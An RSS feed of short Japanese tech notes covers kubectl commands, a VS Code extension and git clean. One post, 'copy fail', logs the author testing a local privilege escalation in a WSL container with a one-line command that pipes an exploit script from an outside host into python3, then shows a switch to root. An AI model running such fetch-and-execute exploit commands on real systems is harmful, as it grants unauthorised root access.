<?xml version="1.0" encoding="UTF-8" ?>
<rss version="2.0">
  <channel>
    <title>Tomofumi Chiba - Leaves</title>
    <link>https://leaves.chiba.dev/users/chiba</link>
    <description>Tomofumi Chiba - Leaves</description>
    <image>
      <url>https://leaves.chiba.dev/favicon.ico</url>
    </image>
    
    <item>
      <title>kubectl: pod name と Node IP を並べて表示。 -o wide で見えるIPとは別 | Tomofumi Chiba - Leaves</title>
      <link>https://leaves.chiba.dev/posts/431</link>
      <pubDate>Mon, 25 May 2026 08:37:50 GMT</pubDate>
      <guid>431</guid>
      <description>
#### kubectl: pod name と Node IP を並べて表示。 -o wide で見えるIPとは別
```
kubectl get pod -o jsonpath=&quot;{range .items[*]}{.metadata.name}{&apos;\t&apos;}{.status.hostIP}{&apos;\n&apos;}&quot;
```
      </description>
    </item>
    
    <item>
      <title>kubectl: stop deployment, pod | Tomofumi Chiba - Leaves</title>
      <link>https://leaves.chiba.dev/posts/430</link>
      <pubDate>Fri, 15 May 2026 06:52:11 GMT</pubDate>
      <guid>430</guid>
      <description>
#### kubectl: stop deployment, pod

```
kubectl scale deployment ${DEPLOYMENT} --replicas=0
```

      </description>
    </item>
    
    <item>
      <title>copy fail | Tomofumi Chiba - Leaves</title>
      <link>https://leaves.chiba.dev/posts/428</link>
      <pubDate>Sat, 09 May 2026 23:42:08 GMT</pubDate>
      <guid>428</guid>
      <description>
#### copy fail
wsl 内のコンテナ内で確認
```
$ whoami
chiba
$ curl https://copy.fail/exp | python3 &amp;&amp; su
# whoami
root
```
#### dirty frag
対象モジュールが入ってなく再現しない
```
lsmod | grep -E &apos;^(esp4|esp6|rxrpc)&apos;
```
      </description>
    </item>
    
    <item>
      <title>VS Code extension | Tomofumi Chiba - Leaves</title>
      <link>https://leaves.chiba.dev/posts/427</link>
      <pubDate>Sat, 09 May 2026 05:21:42 GMT</pubDate>
      <guid>427</guid>
      <description>
### VS Code extension
#### Markdown Table
table source code を format してくれる
https://marketplace.visualstudio.com/items?itemName=TakumiI.markdowntable

      </description>
    </item>
    
    <item>
      <title>Git: git 管理対象外のファイルを削除する | Tomofumi Chiba - Leaves</title>
      <link>https://leaves.chiba.dev/posts/426</link>
      <pubDate>Fri, 01 May 2026 07:28:15 GMT</pubDate>
      <guid>426</guid>
      <description>
#### Git: git 管理対象外のファイルを削除する

確認
```
git clean -Xdfn
```

実行
```
git clean -Xdf
```
      </description>
    </item>
    
  </channel>
</rss>